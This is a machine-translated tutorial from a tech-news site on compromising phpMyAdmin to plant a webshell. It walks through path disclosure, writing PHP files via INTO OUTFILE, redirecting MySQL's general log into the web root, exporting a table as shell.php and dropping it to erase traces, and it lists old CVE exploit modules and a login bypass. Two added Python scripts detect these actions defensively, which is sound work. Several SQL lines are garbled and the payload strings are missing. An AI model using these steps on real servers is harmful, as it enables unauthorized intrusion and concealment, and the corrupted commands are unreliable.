2025-01-18 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)06/01 Report--
This article introduces the relevant knowledge of "the introduction of phpMyAdmin and the usage of GetShell". Many people run into this situation when working on real cases, so let the editor walk you through how to deal with it. I hope you read it carefully and get something out of it!
Introduction to phpMyAdmin
phpMyAdmin is a PHP-based MySQL database management tool that enables webmasters to manage databases through a Web interface.
Information collection
This part mainly needs to collect the physical path of the website; otherwise you will not be able to connect to the shell through a URL.
Physical path
Query the database storage path to infer the physical path of the website; it can also be obtained from the log variable.
select @@datadir;
Path disclosure via configuration files: if the injection point has file read permission, you can try to read the configuration file through load_file.
# Windows
c:\windows\php.ini  # php configuration file
c:\windows\system32\inetsrv\MetaBase.xml  # IIS virtual host configuration file
# Linux
/etc/php.ini  # php configuration file
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf  # Apache configuration file
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf  # Virtual directory configuration file
Path disclosure via a single quotation mark: put a single quotation mark directly after the URL. Requires that single quotation marks are not filtered (gpc=off) and that the server returns an error message by default.
www.abc.com/index.php?id=1'
Path disclosure via an invalid parameter value: try changing the submitted parameter value to an invalid one.
www.abc.com/index.php?id=-1
Path disclosure via Nginx file-type parsing errors: requires that the Web server is Nginx and has a file-type parsing vulnerability. Append /x.php to the address of an image; the image will not only be executed as a PHP file but may also reveal the physical path.
www.abc.com/bg.jpg/x.php
Path disclosure via Google search
site:xxx.com warning
site:xxx.com "fatal error"
Path disclosure via test files
www.xxx.com/test.php
www.xxx.com/ceshi.php
www.xxx.com/info.php
www.xxx.com/phpinfo.php
www.xxx.com/php_info.php
www.xxx.com/1.php
Other
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
/phpmyadmin/libraries/lect_lang.lib.php
/phpMyAdmin/phpinfo.php
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
Other information
The phpMyAdmin background panel directly shows the MySQL version, current user, operating system, PHP version, phpMyAdmin version and other information.
Other information can also be obtained through SQL query.
select version();  -- View database version
select @@datadir;  -- View database storage path
show VARIABLES like '%char%';  -- View system variable
GetShell prerequisite
The real path to the website. If you don't know the real path of the website, you can't connect to the shell through a URL later.
Read and write permissions. Query the secure_file_priv parameter to see whether you have permission to read and write files. If it is NULL, you cannot write the shell. This value is a read-only variable and can only be modified through the configuration file, and the service needs to be restarted after the change.
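A defender-side check of these prerequisites, as an added example that is not part of the original article: it flags a MySQL configuration in which secure_file_priv or general_log_file (the variable used by the log method later in this article) lets the server write into a web root. The function name, the web-root list and the sample variable values are assumptions; the Windows paths are the article's own example paths.

```python
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")

def norm(path):
    # Make G:\phpStudy\WWW and G:/phpstudy/WWW compare equal. Lower-casing is
    # deliberately conservative on case-sensitive filesystems (may over-report).
    return path.replace("\\", "/").rstrip("/").lower()

def is_under(path, root):
    p, r = norm(path), norm(root)
    return p == r or p.startswith(r + "/")

def audit_file_settings(variables, web_roots):
    """Return (variable, finding) tuples for settings that allow writes into a web root."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp is None or sfp.upper() == "NULL":
        pass  # import and export are disabled
    elif sfp == "":
        findings.append(("secure_file_priv", "empty: import/export unrestricted"))
    elif any(is_under(r, sfp) or is_under(sfp, r) for r in web_roots):
        findings.append(("secure_file_priv", "export directory overlaps a web root"))

    # general_log can be switched on at runtime, so the path is checked
    # whether or not logging is currently enabled.
    log_file = variables.get("general_log_file") or ""
    if log_file:
        if any(is_under(log_file, r) for r in web_roots):
            findings.append(("general_log_file", "log file is inside a web root"))
        if norm(log_file).endswith(SCRIPT_EXTS):
            findings.append(("general_log_file", "log file has a script extension"))
    return findings

# Constructed inputs (assumed values), shaped like SHOW VARIABLES output.
WEB_ROOTS = ["G:\\phpStudy\\WWW"]
DEFAULT_LOG = {"secure_file_priv": None, "general_log": "OFF",
               "general_log_file": "G:\\phpStudy\\MySQL\\data\\FengSec.log"}
REDIRECTED = {"secure_file_priv": "", "general_log": "ON",
              "general_log_file": "G:/phpstudy/WWW/log.php"}

if __name__ == "__main__":
    for name, cfg in (("default", DEFAULT_LOG), ("redirected", REDIRECTED)):
        print(name, audit_file_settings(cfg, WEB_ROOTS))
```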
select @@secure_file_priv;  -- query secure_file_priv
-- secure_file_priv=NULL, forbids import and export
-- secure_file_priv='', does not restrict import and export
-- secure_file_priv=/path/, can only import and export to the specified directory
select load_file('cju into outfile. Phpinfo.php');  -- read the file
select '123' into outfile 'cGRAPHANG select load_file;  -- write to the file
regular PHP.
Write the shell directly through a SQL query
-- assume that the physical path is "G:\phpStudy\WWW"
select '' into outfile 'GRV 'phpStudyandWWWUniple shell.phptrees;
Log GetShell
MySQL versions above 5.0 create log files. Enable the log by modifying its global variables, specify the log save path, and then write a one-sentence Trojan through a query. The Trojan is recorded in the generated log file, which results in GetShell. This works only if you have read and write access to the generated log file.
Query log global variables
show variables like '%general%';
Variable_name     Value
general_log       OFF
general_log_file  G:\phpStudy\MySQL\data\FengSec.log
general_log: log save status
general_log_file: log save path
Enable log saving and configure the save path
set global general_log = "ON";  -- enable log saving
set global general_log_file = "G:/phpstudy/WWW/log.php";  -- set the log save path
You need to know the physical path of the website first; otherwise you cannot connect through a URL even if you write the shell.
Write shell
select ';
New table GetShell
Enter a database and create a new data table.
The name is arbitrary; here it is shell_table
Fill in 1 for the number of fields
Add a field
The field name is arbitrary; here it is xiaoma
The field type is TEXT
Click Insert in the table; the value is a one-sentence Trojan
'
Execute a SQL query to export the contents of the table to the specified file
-- assume the physical path is "G:\phpStudy\WWW"
select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";
Delete the table and erase the trace
drop TABLE IF EXISTS shell_table;
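The direct-write, log and new-table methods above all leave the same kinds of statement in a query or audit log. The following detector is an added example, not code from the original article; the log line layout, the WEB_ROOTS value and the alert names are assumptions, and the sample lines are constructed from the article's example paths.

```python
import re

WEB_ROOTS = ["g:/phpstudy/www"]  # assumption: web roots, lower-case, forward slashes
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")

OUTFILE = re.compile(r"into\s+(?:out|dump)file\s+['\"]([^'\"]+)['\"]", re.I)
LOGFILE = re.compile(r"set\s+global\s+general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)
LOADFILE = re.compile(r"\bload_file\s*\(", re.I)

def web_reachable(path):
    p = path.replace("\\", "/").lower()
    return p.endswith(SCRIPT_EXTS) or any(p.startswith(r + "/") for r in WEB_ROOTS)

def classify(statement):
    """Return the alert names raised by one SQL statement."""
    alerts = []
    m = LOGFILE.search(statement)
    if m and web_reachable(m.group(1)):
        alerts.append("general_log_redirected_to_web_path")
    m = OUTFILE.search(statement)
    if m:
        alerts.append("outfile_to_web_path" if web_reachable(m.group(1))
                      else "outfile_export")
    if LOADFILE.search(statement):
        alerts.append("load_file_read")
    return alerts

def scan(log_lines):
    """Return (line_number, alerts) for every log line that raises an alert."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        # The statement is whatever follows the tab-terminated "Query" column.
        _, sep, stmt = line.partition("Query\t")
        alerts = classify(stmt) if sep else []
        if alerts:
            hits.append((n, alerts))
    return hits

# Constructed sample log lines (not real data).
SAMPLE = [
    '2025-01-18T10:00:01Z\t   12 Query\tselect @@datadir',
    '2025-01-18T10:00:05Z\t   12 Query\tset global general_log_file = "G:/phpstudy/WWW/log.php"',
    '2025-01-18T10:00:09Z\t   12 Query\tselect * from shell_table into outfile "G:/phpstudy/WWW/shell.php"',
    '2025-01-18T10:00:12Z\t   12 Query\tselect * from orders into outfile "D:/exports/orders.csv"',
    '2025-01-18T10:00:15Z\t   12 Query\tdrop TABLE IF EXISTS shell_table',
]

if __name__ == "__main__":
    for n, alerts in scan(SAMPLE):
        print(n, alerts)
```

Exports outside a web root are still reported as outfile_export so that they can be reviewed against the directory allowed by secure_file_priv.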
The above steps can also be performed through MySQL statements
create TABLE shell_table (xiaoma text NOT NULL);  -- create the table
insert INTO shell_table (xiaoma) VALUES ('');  -- write
select * from shell_table into outfile 'Granger PhpStudyUniverse WWWWBANG GetShell;  -- export
drop TABLE IF EXISTS shell_table;  -- delete the table
Special version
CVE-2013-3238
Affected version: 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3
Exploit module: exploit/multi/http/phpmyadmin_preg_replace
CVE-2012-5159
Affected version: phpMyAdmin v3.5.2.2
Exploit module: exploit/multi/http/phpmyadmin_3522_backdoor
CVE-2009-1151
Command execution exists in the phpMyAdmin configuration file /config/config.inc.php
Affected version: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
Exploit module: exploit/unix/webapp/phpmyadmin_config
Weak password & Universal password
Weak password: phpMyAdmin version 2.11.9.2, the root user logs in directly without a password
Universal password: versions 2.11.3 / 2.11.4, login succeeds with the user name 'localhost'@'@'
This is the end of the introduction to phpMyAdmin and the usage of GetShell. Thank you for reading. If you want to know more about the industry, you can follow the website; the editor will publish more high-quality practical articles for you!